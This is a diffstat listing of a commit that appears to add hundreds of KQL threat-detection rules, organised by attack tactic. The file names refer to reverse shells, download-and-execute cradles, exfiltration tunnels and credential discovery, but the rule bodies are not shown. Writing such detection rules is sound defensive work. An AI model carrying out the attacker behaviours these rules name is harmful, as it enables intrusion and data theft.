+ ...sual_basic_command_line_compiler_usage.kql | 12 + ...ab_execution_from_non_default_location.kql | 10 + ...bmig_unusual_parent_or_child_processes.kql | 10 + .../weak_or_abused_passwords_in_cli.kql | 15 ++ .../wfp_filter_added_via_registry.kql | 11 + ...s_binaries_write_suspicious_extensions.kql | 10 + .../windows_defender_context_menu_removed.kql | 15 ++ ...dows_defender_definition_files_removed.kql | 10 + ...ndows_defender_exclusion_list_modified.kql | 13 + ...ows_defender_exclusions_added_registry.kql | 12 + ...ows_defender_service_disabled_registry.kql | 12 + ...hreat_severity_default_action_modified.kql | 16 ++ ...ndows_firewall_disabled_via_powershell.kql | 10 + .../windows_kernel_debugger_execution.kql | 12 + ..._processes_suspicious_parent_directory.kql | 12 + .../winget_admin_settings_modification.kql | 12 + ...exe_uncommon_argument_or_child_process.kql | 12 + .../wmic_loading_scripting_libraries.kql | 14 ++ .../write_protect_for_storage_disabled.kql | 12 + ...of_malicious_files_to_the_fonts_folder.kql | 10 + .../Defense Evasion/wsl_kali_linux_usage.kql | 12 + ...mon_locations_via_presentationhost_exe.kql | 13 + .../xsl_script_execution_via_wmic_exe.kql | 16 ++ ...ctory_database_snapshot_via_adexplorer.kql | 10 + ...ing_complete_ad_snapshot_into_dat_file.kql | 12 + .../advanced_ip_scanner_file_event.kql | 12 + ..._monitoring_agent_registry_keys_access.kql | 12 + ...th_service_agents_registry_keys_access.kql | 14 ++ .../Discovery/bloodhound_collection_files.kql | 12 + .../capabilities_discovery_linux.kql | 10 + ...y_and_export_via_get_adcomputer_cmdlet.kql | 12 + ...ter_system_reconnaissance_via_wmic_exe.kql | 10 + .../console_codepage_lookup_via_chcp.kql | 13 + ...esidence_discovery_via_proc_virtual_fs.kql | 13 + KQL/rules/Discovery/crontab_enumeration.kql | 12 + .../detected_windows_software_discovery.kql | 12 + KQL/rules/Discovery/dirlister_execution.kql | 12 + .../Discovery/discovery_of_a_system_time.kql | 12 + ...tainer_discovery_via_dockerenv_listing.kql | 13 + .../domain_trust_discovery_via_dsquery.kql | 12 + .../Discovery/driverquery_exe_execution.kql | 12 + ...merate_all_information_with_whoami_exe.kql | 10 + ...ork_configuration_discovery_via_esxcli.kql | 12 + ...orage_information_discovery_via_esxcli.kql | 12 + ...ystem_information_discovery_via_esxcli.kql | 12 + .../esxi_vm_list_discovery_via_esxcli.kql | 12 + ..._vsan_information_discovery_via_esxcli.kql | 12 + .../file_and_directory_discovery_linux.kql | 13 + .../file_and_directory_discovery_macos.kql | 12 + ..._subfolder_enumeration_via_dir_command.kql | 13 + ...ing_explorer_folder_shortcut_via_shell.kql | 11 + ..._configuration_discovery_via_netsh_exe.kql | 12 + .../Discovery/fsutil_drive_enumeration.kql | 12 + ...kinfo_vbs_reconnaissance_script_output.kql | 10 + ...esult_display_group_policy_information.kql | 10 + ...mbership_reconnaissance_via_whoami_exe.kql | 10 + ...cktool_bloodhound_sharphound_execution.kql | 12 + .../Discovery/hacktool_certify_execution.kql | 10 + .../Discovery/hacktool_certipy_execution.kql | 13 + .../hacktool_sharpldapmonitor_execution.kql | 10 + .../hacktool_sharpldapwhoami_execution.kql | 12 + .../hacktool_sharpview_execution.kql | 10 + .../hacktool_soaphound_execution.kql | 11 + .../hacktool_trufflesnout_execution.kql | 10 + ...ting_of_wifi_credentials_via_netsh_exe.kql | 10 + ...twork_service_scanning_tools_execution.kql | 12 + .../linux_remote_system_discovery.kql | 12 + .../Discovery/local_accounts_discovery.kql | 12 + .../local_groups_discovery_linux.kql | 12 + .../local_groups_discovery_macos.kql | 12 + ...cal_groups_reconnaissance_via_wmic_exe.kql | 14 ++ .../local_system_accounts_discovery_linux.kql | 12 + .../local_system_accounts_discovery_macos.kql | 12 + .../macos_network_service_scanning.kql | 12 + .../macos_remote_system_discovery.kql | 12 + .../network_reconnaissance_activity.kql | 12 + .../Discovery/network_sniffing_macos.kql | 14 ++ ...rk_trace_capture_started_via_netsh_exe.kql | 12 + KQL/rules/Discovery/nltest_exe_execution.kql | 12 + .../notepad_password_files_discovery.kql | 12 + .../obfuscated_ip_download_activity.kql | 10 + KQL/rules/Discovery/obfuscated_ip_via_cli.kql | 10 + .../os_architecture_discovery_via_grep.kql | 11 + .../permission_check_via_accesschk_exe.kql | 12 + KQL/rules/Discovery/pktmon_exe_execution.kql | 12 + ...scan_binary_data_transmission_activity.kql | 12 + ...and_service_reconnaissance_via_reg_exe.kql | 12 + ...container_discovery_via_inodes_listing.kql | 13 + ...al_discovery_activity_using_find_linux.kql | 10 + ...al_discovery_activity_using_find_macos.kql | 10 + ...tial_discovery_activity_via_dnscmd_exe.kql | 12 + ...tential_gobrat_file_discovery_via_grep.kql | 10 + ...l_recon_activity_using_driverquery_exe.kql | 12 + ...otential_recon_activity_via_nltest_exe.kql | 12 + ...nce_activity_via_gathernetworkinfo_vbs.kql | 12 + .../pua_adfind_suspicious_execution.kql | 12 + .../Discovery/pua_adidnsdump_execution.kql | 12 + .../pua_advanced_ip_scanner_execution.kql | 12 + .../pua_advanced_port_scanner_execution.kql | 13 + KQL/rules/Discovery/pua_crassus_execution.kql | 12 + .../Discovery/pua_nmap_zenmap_execution.kql | 12 + .../Discovery/pua_seatbelt_execution.kql | 12 + .../pua_softperfect_netscan_execution.kql | 14 ++ ...vedirectory_enumeration_via_adfind_exe.kql | 12 + .../Discovery/pua_trufflehog_execution.kql | 15 ++ .../pua_trufflehog_execution_linux.kql | 15 ++ .../Discovery/python_initiated_connection.kql | 12 + ...on_command_output_piped_to_findstr_exe.kql | 12 + .../Discovery/renamed_whoami_execution.kql | 10 + .../sam_registry_hive_handle_request.kql | 10 + .../security_software_discovery_linux.kql | 12 + .../security_software_discovery_macos.kql | 12 + ...y_tools_keyword_lookup_via_findstr_exe.kql | 12 + ..._and_session_enumeration_using_net_exe.kql | 12 + .../Discovery/shell_execution_gcc_linux.kql | 11 + .../shell_execution_via_find_linux.kql | 11 + .../shell_execution_via_flock_linux.kql | 11 + .../shell_execution_via_nice_linux.kql | 11 + .../shell_invocation_via_apt_linux.kql | 12 + ...ctory_database_snapshot_via_adexplorer.kql | 10 + .../suspicious_execution_of_hostname.kql | 10 + .../suspicious_execution_of_systeminfo.kql | 10 + ..._reconnaissance_activity_using_net_exe.kql | 15 ++ .../suspicious_kernel_dump_using_dtrace.kql | 10 + .../Discovery/suspicious_network_command.kql | 12 + ...k_connection_to_ip_lookup_service_apis.kql | 12 + .../suspicious_query_of_machineguid.kql | 10 + ...vity_using_get_localgroupmember_cmdlet.kql | 12 + ...nce_activity_via_gathernetworkinfo_vbs.kql | 10 + .../Discovery/suspicious_use_of_psloglist.kql | 13 + .../Discovery/suspicious_where_execution.kql | 13 + .../Discovery/syskey_registry_keys_access.kql | 10 + ...ault_driver_altitude_using_findstr_exe.kql | 10 + .../system_information_discovery.kql | 12 + ...stem_information_discovery_using_ioreg.kql | 15 ++ ...em_information_discovery_using_sw_vers.kql | 12 + ...mation_discovery_using_system_profiler.kql | 14 ++ ...rmation_discovery_via_registry_queries.kql | 12 + ...stem_integrity_protection_sip_disabled.kql | 11 + ...m_integrity_protection_sip_enumeration.kql | 13 + ...em_network_connections_discovery_linux.kql | 12 + ...em_network_connections_discovery_macos.kql | 12 + ...work_connections_discovery_via_net_exe.kql | 10 + .../system_network_discovery_linux.kql | 12 + .../system_network_discovery_macos.kql | 12 + ...ction_to_active_directory_web_services.kql | 13 + ...tem_information_discovery_via_wmic_exe.kql | 14 ++ KQL/rules/Discovery/use_of_w32tm_as_timer.kql | 12 + ...overy_and_export_via_get_aduser_cmdlet.kql | 12 + .../Discovery/vim_gtfobin_abuse_linux.kql | 12 + KQL/rules/Discovery/whoami_as_parameter.kql | 10 + .../whoami_exe_execution_anomaly.kql | 14 ++ ...hoami_exe_execution_with_output_option.kql | 10 + ...ell_cmdlets_execution_proccesscreation.kql | 12 + ...l_sideloading_from_suspicious_location.kql | 10 + ...ndows_capability_via_powershell_cmdlet.kql | 12 + .../adwind_rat_jrat_file_artifact.kql | 10 + .../application_removed_via_wmic_exe.kql | 10 + .../application_terminated_via_wmic_exe.kql | 10 + ...ary_binary_execution_using_gup_utility.kql | 12 + ...arbitrary_msi_download_via_devinit_exe.kql | 10 + ...ommand_execution_via_settingcontent_ms.kql | 10 + ...sembly_dll_creation_via_aspnetcompiler.kql | 13 + .../base64_mz_header_in_commandline.kql | 12 + .../Execution/bash_interactive_shell.kql | 10 + ...y_proxy_execution_via_dotnet_trace_exe.kql | 12 + .../bpftrace_unsafe_option_usage.kql | 12 + ..._exe_from_potentially_suspicious_paths.kql | 11 + .../capsh_shell_invocation_linux.kql | 11 + ...wershell_policies_to_an_insecure_level.kql | 12 + ...eadless_execution_to_mockbin_like_site.kql | 10 + ...ted_in_a_potential_suspicious_location.kql | 10 + ...clr_dll_loaded_via_office_applications.kql | 10 + ...ing_space_characters_execution_anomaly.kql | 12 + ...cmstp_uac_bypass_via_com_object_access.kql | 12 + ...ith_suspicious_url_and_appdata_strings.kql | 12 + ...omputer_password_change_via_ksetup_exe.kql | 10 + ...conhost_exe_commandline_path_traversal.kql | 12 + ...ost_spawned_by_uncommon_parent_process.kql | 10 + ...ion_form_potentially_suspicious_parent.kql | 10 + ...t_potentially_suspicious_child_process.kql | 14 ++ ...pt_uncommon_script_extension_execution.kql | 10 + .../csexec_service_file_creation.kql | 10 + ...quest_with_potential_custom_user_agent.kql | 10 + ...ta_export_from_mssql_table_via_bcp_exe.kql | 14 ++ ..._of_powershell_execution_via_sqlps_exe.kql | 14 ++ ...mbly_dll_loaded_via_office_application.kql | 10 + ...nternals_suspicious_powershell_cmdlets.kql | 14 ++ .../Execution/enable_bpf_kprobes_tracing.kql | 10 + ...enable_microsoft_dynamic_data_exchange.kql | 10 + .../Execution/esxi_vm_kill_via_esxcli.kql | 12 + .../exchange_powershell_snap_ins_usage.kql | 10 + .../execute_code_with_pester_bat.kql | 12 + ...execute_code_with_pester_bat_as_parent.kql | 12 + ..._of_powershell_script_in_public_folder.kql | 12 + ...ed_in_potentially_suspicious_directory.kql | 10 + .../file_decryption_using_gpg4win.kql | 10 + ...file_download_from_ip_url_via_curl_exe.kql | 10 + ..._via_gpg4win_from_suspicious_locations.kql | 10 + .../file_encryption_using_gpg4win.kql | 10 + ...nsion_created_by_an_office_application.kql | 10 + ...edpaths_from_browser_file_upload_abuse.kql | 10 + ...process_from_browser_file_upload_abuse.kql | 15 ++ .../Execution/forfiles_command_execution.kql | 15 ++ .../fsutil_behavior_set_symlinkevaluation.kql | 14 ++ ...gac_dll_loaded_via_office_applications.kql | 12 + .../hacktool_covenant_powershell_launcher.kql | 10 + .../hacktool_crackmapexec_execution.kql | 10 + ...ol_crackmapexec_powershell_obfuscation.kql | 10 + ...rsploit_empire_scheduled_task_creation.kql | 12 + ...ol_empire_powershell_launch_parameters.kql | 12 + ...ol_jlaive_in_memory_assembly_execution.kql | 10 + .../Execution/hacktool_koadic_execution.kql | 10 + .../Execution/hacktool_pchunter_execution.kql | 12 + ...ial_impacket_lateral_movement_activity.kql | 10 + ...l_redmimicry_winnti_playbook_execution.kql | 10 + ...hacktool_sharpwsus_wsuspendu_execution.kql | 12 + ...ool_sliver_c2_implant_activity_pattern.kql | 12 + .../hacktool_stracciatella_execution.kql | 12 + ...ware_model_reconnaissance_via_wmic_exe.kql | 10 + ...hidden_powershell_in_link_file_pattern.kql | 12 + ...mputer_zone_for_http_protocols_via_cli.kql | 11 + ...om_suspicious_directories_proccreation.kql | 10 + ...tion_spawn_shell_via_os_system_library.kql | 11 + ...secure_proxy_doh_transfer_via_curl_exe.kql | 12 + .../insecure_transfer_via_curl_exe.kql | 12 + .../installation_of_wsl_kali_linux.kql | 14 ++ .../interactive_bash_suspicious_children.kql | 12 + KQL/rules/Execution/jamf_mdm_execution.kql | 13 + ...mdm_potential_suspicious_child_process.kql | 12 + .../java_running_with_remote_debugging.kql | 10 + .../jxa_in_memory_execution_via_osascript.kql | 10 + ...security_stopped_via_commandline_linux.kql | 14 ++ .../Execution/linux_hacktool_execution.kql | 12 + .../linux_reverse_shell_indicator.kql | 10 + .../local_file_read_using_curl_exe.kql | 10 + ...on_user_password_change_via_ksetup_exe.kql | 10 + ...acos_scripting_interpreter_applescript.kql | 12 + ...d_powershell_keywords_in_command_lines.kql | 10 + ...powershell_commandlets_processcreation.kql | 10 + ...icious_powershell_scripts_filecreation.kql | 10 + ...l_add_in_loaded_from_uncommon_location.kql | 12 + ...a_for_outlook_addin_loaded_via_outlook.kql | 12 + .../Execution/mmc20_lateral_movement.kql | 12 + ...h_reversed_extensions_using_rtlo_abuse.kql | 13 + .../mmc_loading_script_engines_dlls.kql | 14 ++ .../named_pipe_created_via_mkfifo.kql | 10 + .../net_webclient_casing_anomalies.kql | 10 + ...k_connection_initiated_by_eqnedt32_exe.kql | 12 + ...k_connection_initiated_by_regsvr32_exe.kql | 10 + .../new_application_in_appcompat.kql | 14 ++ .../new_process_created_via_wmic_exe.kql | 10 + ...l_smart_card_created_via_tpmvscmgr_exe.kql | 12 + .../nodejs_execution_of_javascript_file.kql | 16 ++ KQL/rules/Execution/nohup_execution.kql | 12 + ...interactive_powershell_process_spawned.kql | 12 + ...ted_network_connection_to_non_local_ip.kql | 17 ++ ...erator_bloopers_cobalt_strike_commands.kql | 10 + ...perator_bloopers_cobalt_strike_modules.kql | 10 + ...otentially_suspicious_applet_osascript.kql | 10 + .../osacompile_run_only_execution.kql | 10 + ...nnection_initiated_by_microsoft_dialer.kql | 15 ++ ...eunsafeclientmailrules_setting_enabled.kql | 10 + ...d_and_decrypted_via_built_in_utilities.kql | 10 + .../Execution/pcre_net_package_image_load.kql | 10 + .../Execution/pcre_net_package_temp_files.kql | 10 + ...oy_remote_adminstartion_tool_execution.kql | 12 + .../perl_inline_command_execution.kql | 10 + .../php_inline_command_execution.kql | 10 + ...rbitrary_command_execution_via_ftp_exe.kql | 10 + ...arbitrary_file_download_via_cmdl32_exe.kql | 13 + ...inary_impersonating_sysinternals_tools.kql | 13 + ...ial_binary_proxy_execution_via_cdb_exe.kql | 12 + ...al_clickfix_execution_pattern_registry.kql | 16 ++ ...otential_cobaltstrike_process_patterns.kql | 10 + ...commandline_path_traversal_via_cmd_exe.kql | 12 + .../potential_cookies_session_hijacking.kql | 10 + ...tration_activity_via_commandline_tools.kql | 12 + ...tial_dll_injection_via_acccheckconsole.kql | 15 ++ .../potential_dosfuscation_activity.kql | 10 + ...r_script_execution_via_wscript_cscript.kql | 12 + ..._spoofing_using_right_to_left_override.kql | 13 + ...tential_netcat_reverse_shell_execution.kql | 12 + ...potential_perl_reverse_shell_execution.kql | 12 + ...etoolboxcmd_exe_vm_state_change_script.kql | 10 + .../Execution/potential_php_reverse_shell.kql | 12 + ...al_powershell_command_line_obfuscation.kql | 13 + ..._powershell_obfuscation_via_wchar_char.kql | 10 + ...ial_powershell_reverseshell_connection.kql | 12 + ...duct_class_reconnaissance_via_wmic_exe.kql | 15 ++ ...al_product_reconnaissance_via_wmic_exe.kql | 10 + ...tential_rdp_session_hijacking_activity.kql | 12 + ...ger_content_execution_via_werfault_exe.kql | 10 + .../potential_renamed_rundll32_execution.kql | 12 + .../potential_ruby_reverse_shell.kql | 10 + ..._shelldispatch_dll_functionality_abuse.kql | 12 + ...er_launch_from_document_reader_process.kql | 13 + ...rvice_path_reconnaissance_via_wmic_exe.kql | 10 + ...potential_winapi_calls_via_commandline.kql | 12 + ...l_movement_wmiprvse_spawned_powershell.kql | 14 ++ .../potential_xterm_reverse_shell.kql | 10 + ...child_process_of_clickonce_application.kql | 10 + ...lly_suspicious_child_process_of_vscode.kql | 12 + ...suspicious_child_process_of_winrar_exe.kql | 10 + ...d_executed_via_run_dialog_box_registry.kql | 12 + ...cious_electron_application_commandline.kql | 12 + ...uspicious_execution_of_pdqdeployrunner.kql | 12 + ...file_sharing_domain_via_powershell_exe.kql | 10 + ...javascript_execution_via_nodejs_binary.kql | 12 + ...spicious_named_pipe_created_via_mkfifo.kql | 10 + ...tially_suspicious_webdav_lnk_execution.kql | 10 + .../powershell_as_a_service_in_registry.kql | 10 + .../powershell_base64_encoded_iex_cmdlet.kql | 10 + ...wershell_base64_encoded_invoke_keyword.kql | 10 + ...ase64_encoded_reflective_assembly_load.kql | 12 + .../powershell_base64_encoded_wmi_classes.kql | 10 + ...e_dll_loaded_by_non_powershell_process.kql | 15 ++ ...ershell_download_and_execution_cradles.kql | 12 + .../Execution/powershell_download_pattern.kql | 10 + ...with_potential_decryption_capabilities.kql | 12 + ...owershell_inline_execution_from_a_file.kql | 10 + ...dowsinstaller_com_from_remote_location.kql | 14 ++ ...rshell_script_execution_policy_enabled.kql | 12 + .../powershell_script_run_in_appdata.kql | 12 + .../process_reconnaissance_via_wmic_exe.kql | 10 + KQL/rules/Execution/psexec_execution.kql | 12 + ...hild_process_execution_as_local_system.kql | 12 + .../Execution/psexec_service_execution.kql | 12 + .../psexec_service_file_creation.kql | 10 + .../Execution/pua_advancedrun_execution.kql | 10 + KQL/rules/Execution/pua_nircmd_execution.kql | 12 + .../pua_nircmd_execution_as_local_system.kql | 12 + KQL/rules/Execution/pua_nsudo_execution.kql | 12 + .../pua_radmin_viewer_utility_execution.kql | 10 + KQL/rules/Execution/pua_runxcmd_execution.kql | 12 + .../pua_wsudo_suspicious_execution.kql | 10 + .../python_inline_command_execution.kql | 12 + ...l_execution_via_pty_and_socket_modules.kql | 11 + .../python_spawning_pretty_tty_on_windows.kql | 10 + ...hon_spawning_pretty_tty_via_pty_module.kql | 11 + .../Execution/query_usage_to_exfil_data.kql | 10 + .../read_contents_from_stdin_via_cmd_exe.kql | 10 + ...formance_counter_values_via_lodctr_exe.kql | 12 + .../remcom_service_file_creation.kql | 10 + ...with_known_revoked_signing_certificate.kql | 16 ++ ...screenconnect_remote_command_execution.kql | 12 + ...cess_tool_screenconnect_temporary_file.kql | 14 ++ .../remote_dll_load_via_rundll32_exe.kql | 10 + ...powershell_session_host_process_winrm_.kql | 12 + .../Execution/renamed_curl_exe_execution.kql | 10 + .../Execution/renamed_ftp_exe_execution.kql | 10 + .../renamed_jusched_exe_execution.kql | 10 + .../renamed_nircmd_exe_execution.kql | 10 + .../renamed_pingcastle_binary_execution.kql | 10 + .../renamed_psexec_service_execution.kql | 12 + .../ruby_inline_command_execution.kql | 10 + .../scheduled_cron_task_job_linux.kql | 12 + .../scheduled_cron_task_job_macos.kql | 12 + ...heduled_task_creation_via_schtasks_exe.kql | 13 + ...script_event_consumer_spawning_process.kql | 10 + ...reter_execution_from_suspicious_folder.kql | 10 + .../service_reconnaissance_via_wmic_exe.kql | 14 ++ .../service_started_stopped_via_wmic_exe.kql | 10 + ...type_change_via_powershell_set_service.kql | 12 + .../service_startuptype_change_via_sc_exe.kql | 12 + ...on_of_process_located_in_tmp_directory.kql | 10 + .../shell_execution_via_git_linux.kql | 11 + .../shell_execution_via_rsync_linux.kql | 13 + ...shell_invocation_via_env_command_linux.kql | 13 + .../shell_invocation_via_ssh_linux.kql | 11 + .../silenttrinity_stager_msbuild_activity.kql | 10 + ...ent_tools_powershell_session_detection.kql | 14 ++ .../start_windows_service_via_net_exe.kql | 12 + .../successful_account_login_via_wmi.kql | 13 + ..._binaries_and_scripts_in_public_folder.kql | 12 + ...ectory_spawned_from_office_application.kql | 10 + ...suspicious_child_process_of_bginfo_exe.kql | 10 + ...s_deno_file_written_from_remote_source.kql | 14 ++ ...load_and_execute_pattern_via_curl_wget.kql | 17 ++ ...s_electron_application_child_processes.kql | 11 + ...reflection_assembly_load_function_call.kql | 12 + ...icious_encoded_powershell_command_line.kql | 10 + ...cious_execution_location_of_wermgr_exe.kql | 10 + ...us_execution_of_powershell_with_base64.kql | 10 + ...th_whitespace_padding_clickfix_filefix.kql | 13 + ..._characteristics_due_to_missing_fields.kql | 10 + .../suspicious_file_created_in_perflogs.kql | 12 + ..._from_file_sharing_domain_via_curl_exe.kql | 10 + ..._from_file_sharing_domain_via_wget_exe.kql | 10 + ...ous_file_download_from_ip_via_curl_exe.kql | 10 + ...ous_file_download_from_ip_via_wget_exe.kql | 10 + ...le_download_from_ip_via_wget_exe_paths.kql | 10 + ...tion_from_internet_hosted_webdav_share.kql | 10 + ...cious_greedy_compression_using_rar_exe.kql | 10 + ...icious_installer_package_child_process.kql | 12 + ...cious_interactive_powershell_as_system.kql | 13 + ...ious_invocation_of_shell_via_awk_linux.kql | 12 + ...spicious_invocation_of_shell_via_rsync.kql | 11 + .../suspicious_java_children_processes.kql | 10 + ...s_microsoft_office_child_process_macos.kql | 10 + ...uspicious_mshta_exe_execution_patterns.kql | 10 + .../Execution/suspicious_nohup_execution.kql | 10 + .../suspicious_outlook_child_process.kql | 10 + ...etoolboxcmd_exe_vm_state_change_script.kql | 10 + ...owershell_download_and_execute_pattern.kql | 12 + ...us_powershell_encoded_command_patterns.kql | 12 + ...ious_powershell_iex_execution_patterns.kql | 12 + ...picious_powershell_parameter_substring.kql | 10 + .../suspicious_powershell_parent_process.kql | 12 + ...uspicious_process_created_via_wmic_exe.kql | 10 + .../Execution/suspicious_program_names.kql | 12 + ...ious_remote_child_process_from_outlook.kql | 10 + .../suspicious_runscripthelper_exe.kql | 10 + .../suspicious_scan_loop_network.kql | 12 + ...ious_script_execution_from_temp_folder.kql | 12 + ...cters_in_runmru_registry_path_clickfix.kql | 13 + ...rs_in_typedpaths_registry_path_filefix.kql | 13 + ...suspicious_spool_service_child_process.kql | 10 + ...ious_use_of_csharp_interactive_console.kql | 12 + ...icious_windowsterminal_child_processes.kql | 12 + ...ious_wmic_execution_via_office_process.kql | 10 + .../suspicious_wmiprvse_child_process.kql | 10 + .../suspicious_wsman_provider_image_loads.kql | 10 + .../suspicious_zipexec_execution.kql | 10 + .../Execution/sysprep_on_appdata_folder.kql | 12 + ...and_volume_reconnaissance_via_wmic_exe.kql | 13 + .../uac_bypass_using_idiagnostic_profile.kql | 10 + ..._bypass_using_idiagnostic_profile_file.kql | 10 + .../uncommon_child_process_of_bginfo_exe.kql | 10 + ...uncommon_child_processes_of_sndvol_exe.kql | 10 + ..._one_time_only_scheduled_task_at_00_00.kql | 12 + .../unusual_parent_process_for_cmd_exe.kql | 10 + ...ge_of_web_request_commands_and_cmdlets.kql | 12 + .../Execution/use_of_fsharp_interpreters.kql | 14 ++ KQL/rules/Execution/use_of_openconsole.kql | 12 + .../Execution/use_of_pcalua_for_execution.kql | 12 + .../vba_dll_loaded_via_office_application.kql | 12 + ...pressanykey_arbitrary_binary_execution.kql | 12 + ...ejstools_pressanykey_renamed_execution.kql | 10 + .../vmtoolsd_suspicious_child_process.kql | 12 + ...ix_updates_reconnaissance_via_wmic_exe.kql | 10 + ...cation_file_write_to_suspicious_folder.kql | 10 + ...le_file_creation_by_non_system_process.kql | 10 + .../wmic_remote_command_execution.kql | 10 + .../Execution/wmiprvse_spawned_a_process.kql | 12 + .../wmiprvse_wbemcomn_dll_hijack.kql | 10 + .../wmiprvse_wbemcomn_dll_hijack_file.kql | 10 + .../wscript_or_cscript_dropper_file.kql | 10 + .../wscript_shell_run_in_commandline.kql | 12 + .../Execution/wsl_child_process_anomaly.kql | 10 + ...process_located_in_suspicious_location.kql | 12 + ...rectory_structure_export_via_csvde_exe.kql | 10 + ...ectory_structure_export_via_ldifde_exe.kql | 10 + ..._download_via_configsecuritypolicy_exe.kql | 13 + ...n_to_ngrok_tunneling_service_initiated.kql | 15 ++ ...ation_to_ngrok_tunneling_service_linux.kql | 12 + .../disk_image_creation_via_hdiutil_macos.kql | 12 + ...ltration_and_tunneling_tools_execution.kql | 12 + .../email_exifiltration_via_powershell.kql | 10 + ...ports_critical_registry_keys_to_a_file.kql | 12 + .../exports_registry_key_to_a_file.kql | 12 + ...s_data_exfiltration_by_datasvcutil_exe.kql | 14 ++ ...nnection_initiated_to_btunnels_domains.kql | 14 ++ ...itiated_to_cloudflared_tunnels_domains.kql | 14 ++ ...nection_initiated_to_devtunnels_domain.kql | 13 + ...etwork_connection_initiated_to_mega_nz.kql | 14 ++ ...d_to_visual_studio_code_tunnels_domain.kql | 13 + ...ted_network_connection_to_ngrok_domain.kql | 15 ++ .../Exfiltration/pua_rclone_execution.kql | 10 + .../pua_restic_backup_tool_execution.kql | 15 ++ .../python_webserver_execution_linux.kql | 15 ++ .../rclone_config_file_creation.kql | 12 + .../Exfiltration/split_a_file_into_pieces.kql | 12 + .../suspicious_curl_file_upload_linux.kql | 12 + .../suspicious_outbound_smtp_connections.kql | 14 ++ ...ous_powershell_mailbox_export_to_share.kql | 10 + ...cious_redirection_to_local_admin_share.kql | 10 + ...bdav_client_execution_via_rundll32_exe.kql | 11 + .../Exfiltration/tap_installer_execution.kql | 12 + ...bdav_client_execution_via_rundll32_exe.kql | 12 + .../all_backups_deleted_via_wbadmin_exe.kql | 13 + KQL/rules/Impact/backup_files_deleted.kql | 12 + ...onfiguration_tampering_via_bcdedit_exe.kql | 12 + ...copy_from_volumeshadowcopy_via_cmd_exe.kql | 12 + KQL/rules/Impact/dd_file_overwrite.kql | 12 + .../Impact/delete_all_scheduled_tasks.kql | 12 + .../delete_important_scheduled_task.kql | 12 + ...eleted_data_overwritten_via_cipher_exe.kql | 13 + ..._shadow_copies_via_wmi_with_powershell.kql | 10 + .../disable_important_scheduled_task.kql | 10 + ...e_recovery_from_backup_via_wbadmin_exe.kql | 12 + .../group_has_been_deleted_via_groupdel.kql | 12 + KQL/rules/Impact/history_file_deletion.kql | 12 + .../Impact/linux_crypto_mining_indicators.kql | 12 + .../linux_crypto_mining_pool_connections.kql | 12 + ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 15 ++ ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 16 ++ ..._communication_with_crypto_mining_pool.kql | 12 + ...added_to_time_machine_via_tmutil_macos.kql | 14 ++ ...or_ca_or_authroot_certificate_to_store.kql | 10 + .../Impact/portable_gpg_exe_execution.kql | 10 + .../potential_crypto_mining_activity.kql | 13 + ...ile_overwrite_via_sysinternals_sdelete.kql | 10 + ...are_activity_using_legalnotice_message.kql | 10 + ...potential_secure_deletion_with_sdelete.kql | 13 + ...ous_change_to_sensitive_critical_files.kql | 12 + .../registry_disable_system_restore.kql | 10 + .../Impact/renamed_gpg_exe_execution.kql | 10 + ...renamed_sysinternals_sdelete_execution.kql | 12 + ...e_access_via_volume_shadow_copy_backup.kql | 13 + .../stop_windows_service_via_net_exe.kql | 12 + ...ws_service_via_powershell_stop_service.kql | 12 + .../stop_windows_service_via_sc_exe.kql | 12 + ...ious_creation_txt_file_in_user_desktop.kql | 10 + .../suspicious_execution_of_shutdown.kql | 10 + ...cious_execution_of_shutdown_to_log_out.kql | 10 + .../suspicious_macos_firmware_activity.kql | 12 + .../Impact/suspicious_reg_add_bitlocker.kql | 12 + .../Impact/system_shutdown_reboot_macos.kql | 12 + ...ckup_deletion_attempt_via_tmutil_macos.kql | 14 ++ ...chine_backup_disabled_via_tmutil_macos.kql | 14 ++ .../user_has_been_deleted_via_userdel.kql | 12 + ...windows_backup_deleted_via_wbadmin_exe.kql | 15 ++ ...very_environment_disabled_via_reagentc.kql | 15 ++ .../disk_image_mounting_via_hdiutil_macos.kql | 12 + .../iso_file_created_within_temp_folders.kql | 12 + ..._image_mount_indicator_in_recent_files.kql | 14 ++ .../octopus_scanner_malware.kql | 10 + .../office_macro_file_creation.kql | 12 + ..._file_creation_from_suspicious_process.kql | 10 + .../office_macro_file_download.kql | 15 ++ .../phishing_pattern_iso_in_archive.kql | 12 + ...reenconnect_server_web_shell_execution.kql | 12 + ...sions_via_the_registry_2_vpn_extension.kql | 10 + .../shell_process_spawned_by_java_exe.kql | 13 + ...suspicious_browser_child_process_macos.kql | 12 + ...suspicious_child_process_of_sql_server.kql | 10 + ...icious_child_process_of_veeam_dabatase.kql | 10 + ...icious_double_extension_file_execution.kql | 10 + ...xecution_from_outlook_temporary_folder.kql | 10 + ...ious_execution_via_macos_script_editor.kql | 10 + ...created_in_outlook_temporary_directory.kql | 14 ++ ..._write_to_sharepoint_layouts_directory.kql | 12 + .../suspicious_hwp_sub_processes.kql | 10 + ...ine_padding_with_whitespace_characters.kql | 14 ++ ...icious_microsoft_onenote_child_process.kql | 12 + ...sexchangemailboxreplication_aspx_write.kql | 10 + ...spicious_processes_spawned_by_java_exe.kql | 13 + .../suspicious_processes_spawned_by_winrm.kql | 12 + ...s_shells_spawn_by_java_utility_keytool.kql | 10 + .../terminal_service_process_spawn.kql | 10 + ...er_added_to_remote_desktop_users_group.kql | 12 + ...ows_registry_trust_record_modification.kql | 12 + ...rom_or_to_admin_share_or_sysvol_folder.kql | 12 + .../hacktool_sharpmove_tool_execution.kql | 11 + .../hacktool_winrm_access_via_evil_winrm.kql | 10 + .../mmc_spawning_windows_shell.kql | 10 + ...tsc_exe_execution_from_uncommon_parent.kql | 12 + ...rt_forwarding_rule_added_via_netsh_exe.kql | 13 + .../new_portproxy_registry_entry_added.kql | 13 + ...top_connection_initiated_via_mstsc_exe.kql | 14 ++ ...dp_connections_over_non_standard_tools.kql | 14 ++ ...nternetexplorer_application_dll_hijack.kql | 10 + ...orer_application_dll_hijack_image_load.kql | 10 + ...eral_movement_via_activatemicrosoftapp.kql | 11 + ...eral_movement_via_windows_remote_shell.kql | 13 + .../potential_mstsc_shadowing_activity.kql | 10 + .../potential_remote_desktop_tunneling.kql | 10 + ...scalation_via_named_pipe_impersonation.kql | 12 + .../psexec_remote_execution_file_artefact.kql | 12 + ...rt_forwarding_rule_added_via_netsh_exe.kql | 12 + .../rundll32_execution_without_parameters.kql | 12 + .../suspicious_csi_exe_usage.kql | 12 + .../suspicious_rdp_redirect_using_tscon.kql | 10 + .../suspicious_sysaidserver_child.kql 